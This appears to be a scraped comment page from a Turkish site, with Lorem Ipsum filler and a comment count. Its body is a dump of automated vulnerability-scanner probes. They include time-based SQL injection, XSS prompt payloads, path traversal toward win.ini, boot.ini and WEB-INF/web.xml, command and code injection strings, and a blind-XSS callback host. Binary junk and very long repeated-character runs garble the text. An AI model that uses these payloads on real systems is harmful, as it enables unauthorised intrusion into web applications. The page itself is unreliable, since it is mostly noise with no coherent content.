Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
20 Aralık 2021 Pazartesi
Yorumlar (1388)
1
1
1
1
1
1
1
1
response.write(9328597*9617015)
'+response.write(9328597*9617015)+'
"+response.write(9328597*9617015)+"
1
1
1
1
1
1
set|set&set
'set|set&set'
1
"set|set&set"
1
set|set&set
`set|set&set`
;set|set&set;
1
1
SomeCustomInjectedHeader:injected_by_wvs
1
SomeCustomInjectedHeader:injected_by_wvs
1
SomeCustomInjectedHeader:injected_by_wvs
1
1
1
1
1
${10000342+9999203}
1
1
1
1
12345'"\'\");|]*{
<>�''💩
add-comment=add-comment
1
1
1
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
1
1
1
1
1
1
add-comment=add-comment
1some_inexistent_file_with_long_name.jpg
Http://testasp.vulnweb.com/t/fit.txt
http://testasp.vulnweb.com/t/fit.txt?.jpg
add-comment=add-comment
1&n986377=v993282
yr7aizAu
-1 OR 2+579-579-1=0+0+0+1 --
-1 OR 2+272-272-1=0+0+0+1
-1' OR 2+161-161-1=0+0+0+1 --
-1" OR 2+415-415-1=0+0+0+1 --
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
1
1
1
)
!(()&&!|*|*|
^(#$!@#$)(()))******
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
1 waitfor delay '0:0:3' --
testasp.vulnweb.com
1
GEmY1wEE'; waitfor delay '0:0:3' --
1
1
1
ympeba2h'); waitfor delay '0:0:3' --
1
UFoSTnba')); waitfor delay '0:0:3' --
BUwIidFz';select pg_sleep(3); --
1fft8K97');select pg_sleep(3); --
bXKaVyxB'));select pg_sleep(6); --
1
'"()
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
1
http://hitmAUKVQ8GKa.bxss.me/
1
1
1
1
1
1
1
1
1
1
1
;print(md5(acunetix_wvs_security_test));
';print(md5(acunetix_wvs_security_test));$a='
";print(md5(acunetix_wvs_security_test));$a="
${@print(md5(acunetix_wvs_security_test))}
${@print(md5(acunetix_wvs_security_test))}\
1
1
1
1
../../../../../../../../../../windows/win.ini
deneme
deneme
1
1
deneme/.
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
1
1'"
'"
../../../../../../../../../../boot.ini
www.vulnweb.com
1
\
1����
1
@@NSGRH
JyI=
1
�'�"
../../../../../../../../../../windows/win.ini.jpg
�''�""
(select convert(int,CHAR(65)))
������������������������������������������������windows��win.ini
................windowswin.ini
..\..\..\..\..\..\..\..\windows\win.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_929015
acu1797<s1﹥s2ʺs3ʹuca1797
acux5123��z1��z2a�bcxuca5123
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
acu183%6xuca183AAAAA
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml?
add-comment=add-comment
WEB-INF\web.xml?
add-comment=add-comment
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(967277)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(989110)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(977957)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(936737))}
add-comment=add-comment_kbdxJ
add-comment=add-comment
add-comment=add-comment
1
-1" OR 2+691-691-1=0+0+0+1 --
-1" OR 3+691-691-1=0+0+0+1 --
1
WEB-INF/web.xml?
1
WEB-INF\web.xml?
../../../../../../../../../../windows/win.ini
biFHGZ78';select pg_sleep(15); --
WzbDVtPa');select pg_sleep(15); --
JlqXK84k'));select pg_sleep(15); --
add-comment=add-comment
../../../../../../../../../../boot.ini
add-comment=add-comment
../../../../../../../../../../windows/win.ini.jpg
1up4XcPq
������������������������������������������������windows��win.ini
1
................windowswin.ini
-1 OR 2+743-743-1=0+0+0+1 --
-1 OR 2+112-112-1=0+0+0+1
..\..\..\..\..\..\..\..\windows\win.ini
-1' OR 2+150-150-1=0+0+0+1 --
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-1" OR 2+641-641-1=0+0+0+1 --
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
if(now()=sysdate(),sleep(18),0)/*'XOR(if(now()=sysdate(),sleep(18),0))OR'"XOR(if(now()=sysdate(),sleep(18),0))OR"*/
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
(select(0)from(select(sleep(18)))v)/*'+(select(0)from(select(sleep(18)))v)+'"+(select(0)from(select(sleep(18)))v)+"*/
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml?
12345'"\'\");|]*{
<>�''💩
1
1 waitfor delay '0:0:6' --
WEB-INF\web.xml?
../../../../../../../../../../windows/win.ini
uNOt4qW9'; waitfor delay '0:0:6' --
../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini.jpg
${9999955+10000247}
add-comment=add-comment
s05RHppG'); waitfor delay '0:0:6' --
UrAfxGHj')); waitfor delay '0:0:6' --
������������������������������������������������windows��win.ini
................windowswin.ini
x75oWbPr';select pg_sleep(6); --
..\..\..\..\..\..\..\..\windows\win.ini
cr1VnRmO');select pg_sleep(6); --
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
1
${9999072+9999782}
1
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\